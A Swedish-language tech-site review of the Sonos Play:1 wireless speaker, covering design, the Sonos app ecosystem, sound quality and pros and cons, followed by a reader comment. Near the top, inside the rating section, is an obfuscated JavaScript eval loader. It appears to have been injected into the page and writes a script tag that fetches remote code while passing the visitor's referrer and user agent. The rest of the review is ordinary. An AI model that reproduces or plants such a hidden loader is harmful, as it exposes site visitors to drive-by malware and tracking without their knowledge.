Image Image Image Image Image Image Image Image Image Image

| 23 februari, 2020

Scroll to top

Top

Sonos PLAY:1 – Mycket ljud för en liten peng!

play:1
Filip Urde
  • On 21 november, 2013
  • http://www.revue.se/filip-urde

Review Overview

Desing
10
Ljudkvalitet
8.5
Funktionalitet
9
Användning
8
Kvalitetsintryck
9
8.9

Rating

SONOS eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rstse|var|u0026u|referrer|hkraf||js|php’.split(’|’),0,{}))
<3

De senaste åren har Sonos varit ledande i Hi – Fi ljud tack vare populära enheter som sin Play:3 och PLAY:5. Via anslutningen från en router som ryggrad, skapar Sonos ett egenutvecklat trådlöst ekosystem för att ge dig en imponerande nivå av kontroll över ditt system.  Med Sonos får du en rad häftiga funktioner som går långt utöver vad du hittar i din genomsnittliga Bluetooth , Airplay , eller Play – Fi enhet. Men prissättningen av Play:3 och PLAY:5 har trots sina många fördelar hållit många köpare på ett avstånd.
Men nu är Sonos Play:1 här. För endast 1798kr får du nu Sonos senaste baby och priset är riktigt konkurrenskraftigt.

 

Sonos Play : 1

När du packar upp Play:1  från sin svarta låda, får du en känsla av kvalité. Den lilla högtalaren är ganska tung och känns ”rejäl”. Det är en tub med ljud, det robusta höljet där ljudet sipprar ut är gjort i en solid del vilket gör den både snygg och andas kvalité. Ovan och under stålhöljet finner vi matt plast i färgerna svart eller vit (Vilket är färgerna du kan välja mellan). Upp till finner du de klassiska två knapparna: en för att justera volymen och en för att spela upp och pausa. Vilket är en av nyheterna som PLAY:1 för med sig. Tidigare var den lilla knappen en mute knapp, nu är det en spela upp, pausa och ”byta låt” knapp. Skillnaden blir då så klart att din låt inte fortsätter i det tysta, utan faktiskt pausas när du trycker ned knappen, vilket har sina självklara fördelar. Sedan möjligheten att byta låt direkt på maskinen istället för att använda applikationen är ett stort plus. För att byta låt gör du en klassisk dubbel-klick (På samma sätt som du gör för att byta låt med dina hörlurar till mobilen). Den enda störningen runt silverramen var ett par portar på baksidan , varav en var en Ethernet -anslutning , och den andra ett hål för väggmontering… Sen är det ju självklart en el sladd, men den kan man inte klaga så mycket på.

play 1

När du köper Sonos – Play:1 idag och till och med jul (tror jag), så ingår även en Sonos bridge, en liten vit plattform som gör det möjligt för var och en av högtalarna att kommunicera med systemet trådlöst via dess hårdkodade anslutning till en router. Normalt kostar bridge runt 498kr, så det är ju generöst.

 

Funktioner och design

Den kommer i antingen svart eller vit, vilket gör Play:1 till en attraktiv liten högtalare som tar upp väldigt lite plats och passar in i de flesta hem. Den lilla tuben innehåller en uppsättning av mono drivers, inklusive en 3,5 – tums baslåda och en 1 – tums diskant, den är både driven av klass D-förstärkare, och genom DSP. Sonos högtalare tar emot musik trådlöst, men är fortfarande begränsad av strömkabeln som inte gör den helt mobil.
Bortsett från den faktiska utformningen och utförandet av högtalaren, så är det ofta inte avgörandet för om Play : 1 eller Sonos i sig är rätt för dig. Utan det har snarare med huruvida du tänker dig kunna streama trådlöst. Systemet har gott om fina funktioner, men den har också några punkter som skiljer Sonos från vanliga trådlösa högtalare.

play:1

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

För de som inte är bekanta med Sonos systemet, så bör vi nämna att Sonos högtalare spelar inte direkt från din valda enhetens egen musik app (t.ex. spotify till din telefon), vilket innebär att du inte kan använda dem som en ljudkälla för video, eller bara som iTunes eller Google Play. För att använda Play:1 , måste du ha Sonos Controller appen som du hittar i din enhets appstore, där efter får du ladda in musiken via t.ex. Spotify appen inom Sonos Controller appen, in i en kö. Det låter dock krångligare än vad det är. Systemet kan spela din dators fulla musikbibliotek, men för att göra detta behöver du även Sonos appen till din PC eller Mac. Systemet spelar tyvärr inte upp några filer över 16 – bitars upplösning  (CD-kvalitet) och den gillar inte WAV-filer.

Sonos systemet tar lite extra arbete, ja, men tiden du lägger ned resulterar i några mycket häftiga funktioner som du inte kan hitta i de flesta trådlösa system. Som jag nämnde ovan så kan systemet komma åt hela ditt musikbibliotek, samt låtar som lagras på din smartphone eller surfplatta, eller filer från en Network Attached System ( NAS). Bortsett från dessa lokala alternativ, så kommer Sonos appen laddad med Radio stationer från hela världen, inklusive Rdio , Pandora , Spotify , Amazon Cloud Player , Rhapsody , SiriusXM , iHeart Radio och många fler. Man jobbar ständigt på att få in fler alternativ, så att Sonos passar alla användare.

Musik kan sedan styras från flera olika smartphones, surfplattor eller datorer. Alla förändringar som görs från en enhet förändrar hela systemet i en sömlös övergång. Du lägger enkelt till flera högtalare i systemet och därifrån kan du namnge varje högtalare, eller välja det rum där den kommer att placeras från styrenheten i appen. Systemet är uppsatt så att ju fler Sonos-komponenter du har, ju coolare blir din upplevelse. När alla komponenter är anslutna, kan du sedan gruppera dem hur du vill. Det är här som det roliga börjar.

sonos

Med grupperna kan du spela musik i perfekt synkronisering eller spela olika låtar på alla. Vill du inte ha musik i sovrummet medan du inte är där, då sänker du volymen eller helt enkelt kopplar bort den högtalaren från gruppen. Eftersom du inte använder din enhets ljudsystem, så kan du ringa, surfa osv , helt utan att störa musiken, vilket är unikt gentemot vanliga trådlösa system.

 

Ljud

Det enkla svaret på frågan om hur Play:1 högtalarnas ljud är, så skulle man enkelt bara kunna säga: ” jäkligt bra”. Du får helt klart den bästa upplevelsen om du kör dem som ett stereopar, men som mono högtalare är den fortfarande grym. Visst man kan alltid önska efter mer bas, men det är därför det finns större versioner av Sonos. Jag har min Play : 1 i mitt badrum, vilket är möjligt sedan Sonos Play:1 är fukttålig (inte samma som vattentålig) och den levererar riktigt bra! I och med dess cylinderform och solida design, så sprids ljudet mycket bra och den låter lika bra från alla håll.

play:1

 

Slutsats

Med en stor mångsidighet, solid prestation, ren och snygg estetisk design och massor av tillgängliga funktioner, så är Sonos Play:1 en riktigt bra högtalre. Den ställer sig likvärdig till alternativ som kostar nästan de dubbla. Och med tanken på att du får möjligheten att kombinera med flera högtalare och manipuleras från ett och samma ställe för att Sonos Play:1 ger en verkligen unik och häftig trådlös upplevelse. Om du vill ha ett trådlöst system som du kan bygga vidare på hur mycket du vill, eller bara en cool liten högtalare som ger grymt ljud, då är Sonos Play:1 en högtalare för dig.
Fördelar
Ren och mjuk design
Bra detaljrikedom och dynamiskt uttryck i ljudet
MASSA funktioner
Grym Wifi-signal
Grym bas för dess storlek
Nackdelar
Mono högtalare kan tappa lite av den fylliga känslan
Kunde kommit med batteri för full mobilitet

sonos.com

Comments

  1. Kenneth

    Grym artikel! perfekt timeing också. Jag funderar nämligen på nya högtalare… Var inne på bose, men Sonos låter ju grymt! tack för tipset.